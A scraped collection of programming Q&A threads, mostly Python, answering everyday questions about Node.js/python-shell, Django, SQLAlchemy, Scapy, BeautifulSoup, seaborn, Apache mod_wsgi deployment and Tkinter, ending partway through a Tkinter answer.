How to run a Python script in Node.js synchronously?
Question: I am running the following Python script in Node.js through [python-
shell](https://github.com/extrabacon/python-shell):
import sys
import time
x=0
completeData = "";
while x<800:
    crgb = ""+x;
    print crgb
    completeData = completeData + crgb + "@";
    time.sleep(.0001)
    x = x+1
    file = open("sensorData.txt", "w")
    file.write(completeData)
    file.close()
    sys.stdout.flush()
else:
    print "Device not found\n"
And my corresponding Node.js code is:
var PythonShell = require('python-shell');
PythonShell.run('sensor.py', function (err) {
    if (err) throw err;
    console.log('finished');
});
console.log ("Now reading data");
Output is:
Now reading data
finished
But expected output is:
finished
Now reading data
Node.js does not execute my Python script _synchronously_: it first executes all the code following the `PythonShell.run` call, and only then runs `PythonShell.run`'s callback. How can I execute `PythonShell.run` first and the following code afterwards? Any help will be much appreciated... it is an emergency, please!
Answer: As this is asynchronous, add an end callback (found in the documentation) instead of putting the follow-up instructions at the top level:
// end the input stream and allow the process to exit
pyshell.end(function (err) {
    if (err) throw err;
    console.log("Now reading data");
});
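Putting it together, a minimal sketch of the whole fix, assuming the instance-based API from the python-shell README (`new PythonShell(...)` plus `.end(...)`):

var PythonShell = require('python-shell');
var pyshell = new PythonShell('sensor.py');

// end() fires only after the Python process has exited,
// so anything that depends on the script's output goes in this callback
pyshell.end(function (err) {
    if (err) throw err;
    console.log('finished');
    console.log('Now reading data');
});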
|
Why does my break call the previous function
Question: I have two functions, and the first one calls the second. However, when I break out of the second function it displays text from an if statement in the first function. What I don't understand is why the second function seems to call the first. Secondly, I do not understand why it would execute code from an if statement whose condition has never been met.
#! /usr/bin/env python
'''A sorting app where the user gets to choose
between options and the options are ranked by
likes in a file stored on a file'''
import sys
import random
import pickle
def intro():
    greeting = '''\nWelcome to chooser where your voice gets to be heard
Press Enter to begin greatness
Press anything else to be immediately banned
>>'''
    enter = raw_input(greeting).lower()
    if enter == '':
        main()
    if enter == 'admin':
        print 'Entering Admin menu\n'
        admin()
    else:
        print '''\nDid you think I was kidding?!
You're gone!\n'''
        sys.exit()
# Enters the main program if the user presses Enter or else it quits
def main():
    count = 0
    while True:
        nav = '''Type Go to play
Type Q to quit
Type admin to go to admin
>>'''
        start = raw_input(nav).lower()
        if start == 'q':
            print '\nThank you for playing\nBye!\n'
            break
        else:
            print 'Any other key restarts the function'
def chooser():
    pass
if __name__ == '__main__':
    intro()
''' -----Questions-----
Why does this function when it expires run the intro function instead of just
running out of scope????'''
This is what prints out of the terminal:
[![terminal
output](http://i.stack.imgur.com/GwRxF.jpg)](http://i.stack.imgur.com/GwRxF.jpg)
Answer: Basically, at the part:

    if enter == '':
        main()
    if enter == 'admin':
        print 'Entering Admin menu\n'
        admin()
    else:
        print '''\nDid you think I was kidding?!

you have two separate statements: one 'if' and one 'if-else' following it. The first checks whether the input is ''; this condition holds in your example, so main() is called and everything is fine. When main() returns, you exit the first statement and enter the second, which checks whether the input is 'admin' (this is false), and since it isn't, the else branch does the printing.
the logic here is:
* if enter is '', run main().
* if enter is 'admin', run admin().
* if enter is not 'admin', print the message.
The else part is not related at all to the first if (only to the second). What you need to do is replace the second 'if' with an 'elif', making a single 'if-elif-else' statement, so the logic becomes (a corrected version of the block is shown after this list):
* if enter is '', run main().
* if enter is not '', and enter is 'admin', run admin().
* if enter is not '', and not 'admin', print the message.
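Applied to the code from the question, the corrected block is:

    if enter == '':
        main()
    elif enter == 'admin':
        print 'Entering Admin menu\n'
        admin()
    else:
        print '''\nDid you think I was kidding?!
You're gone!\n'''
        sys.exit()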
|
Python Scapy output to txt file
Question: **I would like to output just IP.dst to a txt file, but I get all the packet info including Ether, src, etc.**
from scapy.all import *
import time
import os
file = open("newfile.txt","w")
t = '%IP.dst%'
p = sniff(filter="ip", prn=lambda x:x.sprintf(t), count=10)
file.write(str(p))
time.sleep(1)
os.system("cls")
**Sample output of txt file**
> Ether dst=f4:ce:46:5c:bf:f8 src=30:10:b3:24:63:b6 type=0x800 /|IP version=4L
> ihl=5L
Answer: @TeckSupport how about if you set up a function that pulls and writes the
IP.dst:
from scapy.all import *

fob = open("IP.txt","w")

def ip_dst(pkt):
    fob.write(pkt[IP].dst+'\n')

sniff(filter='ip',count=10,prn=ip_dst)
fob.close()
Is this what you were looking to do?
|
Create list of list in python
Question: Suppose I have three lists
[-1,0,1,2]
[0,1]
[a,b,c]
I would like to obtain a list as
[-1,0,a]
[-1,0,b]
[-1,0,c]
[-1,1,a]
[-1,1,b]
[-1,1,c]
[0,0,a]
[0,0,b]
[0,0,c]
...
How to write a python function to achieve this goal?
Answer: You can use
[`itertools.product()`](https://docs.python.org/2/library/itertools.html#itertools.product):
from itertools import product
from pprint import pprint
l = [[-1, 0, 1, 2], [0, 1], ['a', 'b', 'c']]
result = list(product(*l))
pprint(result)
Result:
[(-1, 0, 'a'),
(-1, 0, 'b'),
(-1, 0, 'c'),
(-1, 1, 'a'),
(-1, 1, 'b'),
(-1, 1, 'c'),
(0, 0, 'a'),
(0, 0, 'b'),
(0, 0, 'c'),
(0, 1, 'a'),
(0, 1, 'b'),
(0, 1, 'c'),
(1, 0, 'a'),
(1, 0, 'b'),
(1, 0, 'c'),
(1, 1, 'a'),
(1, 1, 'b'),
(1, 1, 'c'),
(2, 0, 'a'),
(2, 0, 'b'),
(2, 0, 'c'),
(2, 1, 'a'),
(2, 1, 'b'),
(2, 1, 'c')]
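The question shows lists rather than tuples; if that matters, a one-line adjustment converts each tuple:

result = [list(t) for t in product(*l)]  # [[-1, 0, 'a'], [-1, 0, 'b'], ...]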
|
Difference between scikit-learn and sklearn
Question: On OS X 10.11.6 and python 2.7.10 I need to import from sklearn.manifold. I have numpy 1.8.0rc1, scipy 0.13.0b1 and scikit-learn 0.17.1 installed. I used pip to install sklearn (0.0), but when I try to import from sklearn.manifold I get the following:
> Traceback (most recent call last): File "", line 1, in File
> "/Library/Python/2.7/site-packages/sklearn/**init**.py", line 57, in from
> .base import clone File "/Library/Python/2.7/site-packages/sklearn/base.py",
> line 11, in from .utils.fixes import signature File
> "/Library/Python/2.7/site-packages/sklearn/utils/**init**.py", line 10, in
> from .murmurhash import murmurhash3_32 File "numpy.pxd", line 155, in init
> sklearn.utils.murmurhash (sklearn/utils/murmurhash.c:5029) ValueError:
> numpy.dtype has the wrong size, try recompiling.
What is the difference between scikit-learn and sklearn? Also, I can't import scikit-learn because of a syntax error.
Answer: You might need to reinstall numpy. It doesn't seem to have installed
correctly.
`sklearn` is the name you use to import scikit-learn in Python; they are the same package.
Also, try running the standard tests in scikit-learn and check the output. You
will have detailed error information there.
Do you have `nosetests` installed? Try: `nosetests -v sklearn`. You type this
in bash, not in the python interpreter.
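As an aside, one way to force a clean reinstall of numpy with pip (this assumes pip manages your numpy; the system Python may require `sudo`):

pip install --upgrade --force-reinstall numpy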
|
How do I make button press first stopping a playing audio file and then playing its own audio?
Question: My problem is that the audio files under each button are quite lengthy, and if I pressed the wrong button I would have to wait for it to play to the end. How can I make every button press 1) stop the currently playing audio file and then 2) play its own file? I'm using mpg123 to play the audio files, and the file names are placeholders.
Code:
#!/usr/bin/env python
import os
from time import sleep
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.IN)
GPIO.setup(19, GPIO.IN)
GPIO.setup(20, GPIO.IN)
GPIO.setup(21, GPIO.IN)
GPIO.setup(22, GPIO.IN)
GPIO.setup(23, GPIO.IN)
GPIO.setup(24, GPIO.IN)
GPIO.setup(25, GPIO.IN)
GPIO.setup(26, GPIO.IN)
GPIO.setup(27, GPIO.IN)
while True:
    if (GPIO.input(18)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(19)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(20)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(21)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(22)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(23)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(24)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(25)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(26)==False):
        os.system('mpg123 audio.mp3 &')
    if (GPIO.input(27)==False):
        os.system('mpg123 audio.mp3 &')
    sleep(0.1)
Answer: You can use [subprocess](https://docs.python.org/3/library/subprocess.html) asynchronously so the function call returns immediately. You get a "handle" object to communicate with the external process that also allows you to ["kill"](http://stackoverflow.com/questions/16866602/kill-a-running-subprocess-call) it. Similarly, you could check your keys in the main program and start a thread for playing: <http://docs.python.org/3/library/threading.html> (though this does not make much sense here, as the player is a separate process anyway).
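A minimal sketch of the subprocess idea (file names are placeholders, as in the question):

import subprocess

player = None  # handle to whichever mpg123 process is currently playing

def play(path):
    """Kill any running playback, then start the new file."""
    global player
    if player is not None and player.poll() is None:  # still running?
        player.kill()
        player.wait()  # reap the old process
    player = subprocess.Popen(['mpg123', path])

Each `if GPIO.input(n) == False:` branch would then call `play('audio.mp3')` instead of `os.system(...)`.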
|
Python: count specific occurrences in a dictionary
Question: Say I have a dictionary like this:
d={
'0101001':(1,0.0),
'0101002':(2,0.0),
'0101003':(3,0.5),
'0103001':(1,0.0),
'0103002':(2,0.9),
'0103003':(3,0.4),
'0105001':(1,0.0),
'0105002':(2,1.0),
'0105003':(3,0.0)}
Considering that the first four digits of each key constitute the identifier of a "slot" of elements (e.g., '0101', '0103', '0105'), how can I count the number of occurrences of `0.0` for each slot?
The intended outcome is a dict like this:
result={
'0101': 2,
'0103': 1,
'0105': 2}
Apologies for not being able to provide my attempt as I don't really know how
to do this.
Answer: Use a [Counter](https://docs.python.org/2/library/collections.html#counter-objects), adding the first four digits of the key whenever the value is what you're looking for:
from collections import Counter

counts = Counter()
for key, value in d.items():
    if value[1] == 0.0:
        counts[key[:4]] += 1

print counts
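For the dictionary above this prints (the ordering of equal counts may vary):

Counter({'0101': 2, '0105': 2, '0103': 1})

and `dict(counts)` converts it to a plain dict if you need exactly the type shown in the question.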
|
Sentry django configuration - logger
Question: I am trying to use simple logging and want to send errors/exceptions to Sentry. I configured Sentry as per the documentation and ran the test successfully on my dev machine (`python manage.py raven test`). I added the logging configuration as in the [Sentry documentation](https://docs.getsentry.com/hosted/clients/python/integrations/django/) to the Django settings. But when I put this code in my view, it doesn't work at all:
import logging
logger = logging.getLogger(__name__)
logger.error('There was an error, with a stacktrace!', extra={
    'stack': True,
})
Maybe I am missing something
Thanks for the help
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'root': {
        'level': 'WARNING',
        'handlers': ['sentry'],
    },
    'formatters': {
        'verbose': {
            'format': '%(levelname)s %(asctime)s %(module)s '
                      '%(process)d %(thread)d %(message)s'
        },
    },
    'handlers': {
        'sentry': {
            'level': 'ERROR',  # To capture more than ERROR, change to WARNING, INFO, etc.
            'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
            'tags': {'custom-tag': 'x'},
        },
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'verbose'
        }
    },
    'loggers': {
        'django.db.backends': {
            'level': 'ERROR',
            'handlers': ['console'],
            'propagate': False,
        },
        'raven': {
            'level': 'DEBUG',
            'handlers': ['console'],
            'propagate': False,
        },
        'sentry.errors': {
            'level': 'DEBUG',
            'handlers': ['console'],
            'propagate': False,
        },
    },
}
Answer: When you call `logger = logging.getLogger(__name__)`, Python [creates a new logger](https://docs.djangoproject.com/ja/1.9/topics/logging/#naming-loggers) named after your module. One option, if you want to log directly to only Sentry, is to use:
logger = logging.getLogger('sentry.errors')
There are many other configurations for loggers as well as inheritance for
loggers on that page in the documentation.
|
why use sqlalchemy declarative api?
Question: New to sqlalchemy and somewhat of a novice with programming and python. I wanted to query a table. It seems I can use the all() function when querying but cannot filter without creating a class. 1.) Can I filter without creating a class and using the declarative api? Is the filtering example stated below incorrect? 2.) When would it be appropriate to use the declarative api in sqlalchemy and when would it not be appropriate?
import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
Answer: Filter this way, using `==` (comparison) rather than `=` (assignment); note that since `files` is a core `Table`, its columns are accessed through the `.c` collection:

    session.query(files).filter(files.c.file_name == 'test.json').all()
You can also use raw sql queries ([docs](http://docs.sqlalchemy.org/en/latest/core/connections.html#basic-usage)). Whether to use the declarative api may depend on your queries' complexity, because sometimes sqlalchemy doesn't optimize them the right way.
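For comparison, a minimal sketch of the declarative equivalent of the question's table (column names taken from the question; the rest is standard declarative boilerplate):

from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()

class File(Base):
    __tablename__ = 'files'
    __table_args__ = {'schema': 'indeed'}

    file_id = Column(Integer, primary_key=True)
    file_name = Column(String(256))
    query = Column(String(256))
    results = Column(Integer)
    totalresults = Column(Integer)

# with a mapped class, columns are plain attributes:
session.query(File).filter(File.file_name == 'test.json').all()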
|
format date 'Fri Apr 15 04_01_33 2016' and '2015-12-16 22-39-28' Using python datetime format date
Question: Here is a simple way to format dates using datetime:
from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
Output :
2016-04-07 04:54:53
2016-04-15 04:01:33
Answer: **A simple way to format dates using datetime**
from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
datetime = datetime.strptime(date, format)
datetime1 = datetime.strptime(date1, format1)
print(datetime)
print(datetime1)
Output :
2016-04-07 04:54:53
2016-04-15 04:01:33
Vote if you got the right answer.
|
Cannot see prints with python-tensorflow
Question: I have the following program written in python:
import tensorflow as tf

def main(_): print(something)

if __name__ == 'main': tf.app.run()

Whether I run it with bazel or not, I cannot see the output of the print function. Why?
Answer: I think the problem is with the last line, which should be
if __name__ == '__main__': tf.app.run()
(note: __main__ instead of main)... This code works for me:
import tensorflow as tf

def main(_):
    print("something")

if __name__ == '__main__':
    tf.app.run()
|
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts
Question: I'm having an issue that is driving me absolutely crazy. I am a newbie to web scraping, and I am practicing by trying to scrape the contents of a forum post, namely the actual posts people made. I have isolated the posts to what I think contains the text, which is div id="post_message_2793649" (see attached Screenshot_1 for a better representation of the HTML). [Screenshot_1](http://i.stack.imgur.com/6L3zf.png) The example above is just one of many posts. Each post has its own unique identifier number, but the rest is consistent as div id="post_message_. Here is where I am stuck currently:
import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
    print(link.find_all('div', {'id': 'post_message'}))
The above code just creates a bunch of empty lists that go down the page, which is so frustrating. (See Screenshot_2 for the code that I ran with its output next to it.) [Screenshot_2](http://i.stack.imgur.com/nBcOl.png) What am I missing? The end result I am looking for is just the contents of what people said, in a long string without any of the HTML clutter. I am using Beautiful Soup 4 running the lxml parser.
Answer: There's nothing with the id `post_message`, so `link.find_all` returns an
empty list. You'll first want to grab all of the ids within all the `div`s,
and then filter that list of ids with a regex (e.g.) to get only those that
start with `post_message_` and then a number. Then you can do
for message_id in message_ids:
    print(link.find_all('div', {'id': message_id}))
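A short sketch of that filtering idea, using the fact that `find_all` accepts a compiled regex for an attribute value (the pattern is an assumption based on the id scheme described in the question):

import re
from bs4 import BeautifulSoup

soup = BeautifulSoup(r.content, 'lxml')
# match any div whose id is post_message_ followed by digits
for div in soup.find_all('div', id=re.compile(r'^post_message_\d+$')):
    print(div.get_text(strip=True))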
|
simplest python equivalent to R's grepl
Question: Is there a simple/one-line python equivalent to R's `grepl` function?
strings = c("aString", "yetAnotherString", "evenAnotherOne")
grepl(pattern = "String", x = strings) #[1] TRUE TRUE FALSE
Answer: You can use list comprehension:
strings = ["aString", "yetAnotherString", "evenAnotherOne"]
["String" in i for i in strings]
#Out[76]: [True, True, False]
Or use `re` module:
import re
[bool(re.search("String", i)) for i in strings]
#Out[77]: [True, True, False]
Or with `Pandas` (R user may be interested in this library, using a dataframe
"similar" structure):
import pandas as pd
pd.Series(strings).str.contains('String').tolist()
#Out[78]: [True, True, False]
|
How come when I import of two functions from the same module, the import works only for one the two?
Question: **Intro**
I am running a python script on a cluster. I run everything in a virtualenv, and in the code I am importing two functions from the same module (written in SC_module.py):
SC_module.py):
ex. SC_module.py
def funA():
def funB():
In the script script.py I have the following import
from SC_module import funA,funB
When I run the code on the HPC I get an import error: funB cannot be found. If I type
from SC_module import funA
everything works fine. If I run `python3` from the command line and run
from SC_module import funA,funB
everything works and funB is imported.
**Question**
The only difference between funA() and funB() is that they were coded on two different days.
_NB_: If I add a new function to the module, it will not be loaded when starting the process, but it will be imported if I use the terminal. Is there something I am missing in the loading of the module on the cluster?
Thanks
Answer: Remove the stale compiled file `SC_module.pyc` and try running it again; the cluster was importing an out-of-date bytecode cache that predates `funB`.
|
Django: 'BaseTable' object does not support indexing
Question: I'm migrating my project to Django 1.8 and I am receiving an error related to johnny-cache, specifically in 'johnny/cache.py'.
**Error:**

    lib/python2.7/site-packages/johnny/cache.py", line 87, in get_tables_for_query
        tables = set([v[0] for v in getattr(query, 'alias_map', {}).values()])

**TypeError: 'BaseTable' object does not support indexing**
I have included my code below for the function where the error originates. Advice on whether I should use something other than johnny-cache for caching would be helpful, and/or info as to the meaning of this error and how to fix it. Thank you!
def get_tables_for_query(query):
    """
    Takes a Django 'query' object and returns all tables that will be used in
    that query as a list. Note that where clauses can have their own
    querysets with their own dependent queries, etc.
    """
    from django.db.models.sql.where import WhereNode, SubqueryConstraint
    from django.db.models.query import QuerySet

    tables = set([v[0] for v in getattr(query, 'alias_map', {}).values()])

    def get_sub_query_tables(node):
        query = node.query_object
        if not hasattr(query, 'field_names'):
            query = query.values(*node.targets)
        else:
            query = query._clone()
        query = query.query
        return set([v[0] for v in getattr(query, 'alias_map', {}).values()])

    def get_tables(node, tables):
        if isinstance(node, SubqueryConstraint):
            return get_sub_query_tables(node)
        for child in node.children:
            if isinstance(child, WhereNode):  # and child.children:
                tables = get_tables(child, tables)
            elif not hasattr(child, '__iter__'):
                continue
            else:
                for item in (c for c in child if isinstance(c, QuerySet)):
                    tables += get_tables_for_query(item.query)
        return tables

    if query.where and query.where.children:
        where_nodes = [c for c in query.where.children if isinstance(c, (WhereNode, SubqueryConstraint))]
        for node in where_nodes:
            tables += get_tables(node, tables)

    return list(set(tables))
Answer: Found your problem when I looked a bit further into your library.
From the [Johnny Cache documentation](https://pythonhosted.org/johnny-cache/):
> It works with Django 1.1 thru 1.4 and python 2.4 thru 2.7.
From your question:
> I'm migrating my project to Django 1.8.
In fact, it looks like the library you're using is woefully out of date and no
longer maintained:
> Latest commit d96ea94 on Nov 10, 2014
|
seaborn violin plot, how can I set labels?
Question: I'm plotting a list of vectors as a sequence of violin plots. I'd use a pandas
dataframe, but the lists are unequal lengths.
This works: `g = sns.violinplot(data=res, cut=0, inner='box')`
where 'res' is a list of lists (each a vector of floats), where each vector
should be turned into a violin. It is.
but the x axis is just labeled '0,1,2...'. Adding the parameter
'names=[0,1,2...]' is silently ignored.
Answer: You can use the `.set_xticklabels()` method:
g = sns.violinplot (data=res, cut=0, inner='box')
g.set_xticklabels(['a','b','c'...])
Example:
import numpy as np, seaborn as sns
res = [i for i in (np.random.randn(3, 25))]
ax = sns.violinplot(data=res, cut=0, inner='box')
ax.set_xticklabels(['a','b','c'])
Results in:
[![enter image description
here](http://i.stack.imgur.com/kB9ue.png)](http://i.stack.imgur.com/kB9ue.png)
|
django deploy - ubuntu 14.04 and apache2
Question: <https://www.sitepoint.com/deploying-a-django-app-with-mod_wsgi-on-ubuntu-14-04/> and <https://www.youtube.com/watch?v=hBMVVruB9Vs> This was the first time I deployed a website, and these are the tutorials I followed. Now I can access the server (by typing 10.231.XX.XX) from another machine and see the Apache2 Ubuntu Default Page. Then I tried to access my django project. I ran:
> python manage.py runserver 8000
> Validating models...
>
> 0 errors found
> August 03, 2016 - 09:44:20
> Django version 1.6.1, using settings 'settings'
> Starting development server at <http://127.0.0.1:8000/>
> Quit the server with CONTROL-C.
Then I typed 10.231.XX.XX:8000 to try to access the django page, but I failed. It said:
> This site can’t be reached
>
> 10.231.XX.XX refused to connect. Search Google for 231 8000
> ERR_CONNECTION_REFUSED
I have tried everything I can but still can't figure out why (I followed the website <https://www.sitepoint.com/deploying-a-django-app-with-mod_wsgi-on-ubuntu-14-04/>). I have an apache folder in my mysite folder, and in override.py:
from mysite.settings import *
DEBUG = True
ALLOWED_HOSTS = ['10.231.XX.XX']
in wsgi.py:
import os, sys
# Calculate the path based on the location of the WSGI script.
apache_configuration= os.path.dirname(__file__)
project = os.path.dirname(apache_configuration)
workspace = os.path.dirname(project)
sys.path.append(workspace)
sys.path.append(project)
# Add the path to 3rd party django application and to django itself.
sys.path.append('/home/zhaojf1')
os.environ['DJANGO_SETTINGS_MODULE'] = '10.231.52.XX.apache.override'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
and `__init__.py` is empty.
in /etc/apache2/sites-enabled/000-default.conf :
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
WSGIScriptAlias /msa.html /home/zhaojf1/Web-Interaction/apache/wsgi.py
<Directory "/home/zhaojf1/Web-Interaction-APP">
<Files wsgi.py>
Require all granted
</Files>
</Directory>
I have also restarted Apache after each change. Thanks for the help.
Answer: The connection refused error is likely going to come down to Apache being incorrectly configured for the `VirtualHost`, or to you accessing the wrong port. You also have other basic mistakes in your `wsgi.py` file.
Starting with the `wsgi.py` file, the `DJANGO_SETTINGS_MODULE` value is wrong:
os.environ['DJANGO_SETTINGS_MODULE'] = '10.231.52.XX.apache.override'
The value is meant to be a Python module path. Having the IP address in there
looks very wrong and is unlikely to yield what you need.
Next is changes to `sys.path`. The location of your project and activation of
any Python virtual environment is better done through options for mod_wsgi in
the Apache configuration file.
That you are adding a home directory into the path is also a flag to potential
other issues you may encounter. Specifically, the user that Apache runs as
often cannot read into home directories as the home directories are not
readable/accessible to others. You may need to move the project out of your
home directory.
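Putting those `wsgi.py` points together, a minimal sketch of what the file might look like instead (the module path `mysite.apache.override` and the project path are assumptions based on the snippets above):

import os, sys

# make the package containing 'mysite' importable
sys.path.append('/home/zhaojf1/Web-Interaction')

# a Python module path, not an IP address or file path
os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.apache.override'

import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()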
As to the Apache configuration, your `VirtualHost` lacks a `ServerName`
directive. If this was an additional `VirtualHost` you added and not the
default (first one appearing in Apache configuration when parsed), it will be
ignored, with all requests going to the first `VirtualHost`. You do show this as being in the default site file, so maybe you are okay.
Even so, that `VirtualHost` is set up to listen on port 80. You are trying to connect to port 8000, so there wouldn't be anything listening.
Next issue is the `WSGIScriptAlias` line.
WSGIScriptAlias /msa.html /home/zhaojf1/Web-Interaction/apache/wsgi.py
It is strange to have `msa.html` as the mount point, as that makes it appear as if you are accessing a single HTML page, yet you have it mapped to a whole Django project. If you were accessing the root of the host, it also wouldn't map through to the Django application, as you have it mounted at a sub URL. Thus you perhaps need to use:
WSGIScriptAlias / /home/zhaojf1/Web-Interaction/apache/wsgi.py
Next problem is that the directory specified in `Directory` directive doesn't
match where you said the `wsgi.py` file existed in the `WSGIScriptAlias`. They
should match. So maybe you meant:
<Directory /home/zhaojf1/Web-Interaction/apache>
Even then that doesn't look right: where is the `apache` directory coming from? The last directory in the path should normally be the name of the Django project.
One final thing, you may need to change `ALLOWED_HOSTS` as well. If you find
you start getting bad request errors it probably doesn't match properly.
Change it to `['*']` to see if that helps.
So lots of little things wrong.
Suggestions are:
* Make sure you read the official Django documentation for setting up mod_wsgi. See <https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/modwsgi/>
* If you are only wanting to do development at this point, use mod_wsgi-express instead. See <http://blog.dscpl.com.au/2015/04/using-modwsgi-express-with-django.html> and <http://blog.dscpl.com.au/2015/04/integrating-modwsgi-express-as-django.html>
|
Python 3 - Tkinter button commands
Question: I am new to Tkinter and Python as well. I have three buttons with commands in
my Tkinter frame. Button 1 calls open_csv_dialog(), opens a file dialog box to
select a .csv file and returns the path. Button 2 calls
save_destination_folder(), opens a file dialog box to open the preferred
directory and return the path.
My problem is with Button 3. It calls modify_word_doc() which needs the
filepaths returned from button 1 and button 2.
I have tried;
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
but that obviously just prompts the file dialog box to open again for both the
open_csv_dialog() and save_destination_folder() function which is undesired. I
would like to just use the file path that was already returned from these two
functions and pass it into modify_word_doc without being prompted by another
file dialog box. I have also tried to use `partial` but I'm either using it
wrong or it still has the same undesired consequences.
I have read the Tkinter docs about commands and searched SO for a possible
answer, so apologies if this has been answered before and I failed to find it.
import tkinter as tk
from tkinter import filedialog
from tkinter import ttk
import os
import csv
import docx
from functools import partial
root = tk.Tk()
def open_csv_dialog():
    file_path = filedialog.askopenfilename(filetypes=(("Database files", "*.csv"),
                                                      ("All files", "*.*")))
    return file_path

def save_destination_folder():
    file_path = filedialog.askdirectory()
    return file_path

def modify_word_doc(data, location):
    #data = open_csv_dialog()
    #location = save_destination_folder()
    #long code. takes .csv file path opens, reads and modifies word doc with
    #the contents of the .csv, then saves the new word doc to the requested
    #file path returned from save_destination_folder().
    pass

label = ttk.Label(root, text="Step 1 - Choose CSV File.", font=LARGE_FONT)
label.pack(pady=10, padx=10)
button = ttk.Button(root, text="Choose CSV", command=open_csv_dialog).pack()

label = ttk.Label(root, text="Step 2 - Choose destination folder for your letters.", font=LARGE_FONT)
label.pack(pady=10, padx=10)
button2 = ttk.Button(root, text="Choose Folder", command=save_destination_folder).pack()

label = ttk.Label(root, text="Step 3 - Select Run.", font=LARGE_FONT)
label.pack(pady=10, padx=10)
button3 = ttk.Button(root, text="Run",
                     command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
root.mainloop()
Answer: This was probably just an error typing the question.... but for completeness
on this line
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder).pack()
You're missing the closing parenthesis for `ttk.Button(...).pack()`.
It should be (syntactically):
button3 = ttk.Button(root, text="Run", command=lambda: modify_word_doc(open_csv_dialog, save_destination_folder)).pack()
Also, using `.pack()` returns `None` so setting a variable to a widget +
geometry manager method just sets that variable to nothing, instead of a
reference to the widget object.
So, if you actually need a reference to this widget you should actually do:
button3 = ttk.Button(...)
button3.pack()
If you don't need a reference then just don't assign anything and save
yourself some typing, since it's redundant.
For the actual question:
If I understand your question, you have two buttons which set the file path of
the .csv and the destination folder. However, since both your functions use
the dialog you are being prompted again even though the may have already been
chosen.
You could use globals and various other ways to do this, I'll set an attribute
on the base root window since i think this is easiest here...
In the below code what I did was simply set an attribute on the `root` window
if the `file_path` has been selected. You can check this with an `if`
statement.
Then in either callback I call `check_state` to see if the root window has both of these attributes. `getattr(object, name, default)` returns the attribute, or the default if the attribute does not exist. So, by setting the attribute to the path string, or to None if the dialog was cancelled, the state is always updated correctly.
You can clean this up some more. You could actually make both of those one
function etc if you really wanted to.
import tkinter as tk
from tkinter import filedialog, ttk

def check_state():
    if getattr(root, 'csv_path', False) and getattr(root, 'dest_path', False):
        button3['state'] = 'normal'
    else:
        button3['state'] = 'disabled'

def open_csv_dialog():
    file_path = filedialog.askopenfilename(
        filetypes=(("Database files", "*.csv"), ("All files", "*.*")))
    if file_path:
        root.csv_path = file_path
    else:
        root.csv_path = None
    check_state()

def save_destination_folder():
    file_path = filedialog.askdirectory()
    if file_path:
        root.dest_path = file_path
    else:
        root.dest_path = None
    check_state()

def modify_word_doc():
    print(root.csv_path, root.dest_path)

root = tk.Tk()

ttk.Label(root, text="Step 1 - Choose CSV File.").pack(pady=10, padx=10)
ttk.Button(root, text="Choose CSV", command=open_csv_dialog).pack()

ttk.Label(root, text="Step 2 - Choose destination folder for your letters.").pack(pady=10, padx=10)
ttk.Button(root, text="Choose Folder", command=save_destination_folder).pack()

ttk.Label(root, text="Step 3 - Select Run.").pack(pady=10, padx=10)
# We need a reference to the widget here, for the state func...
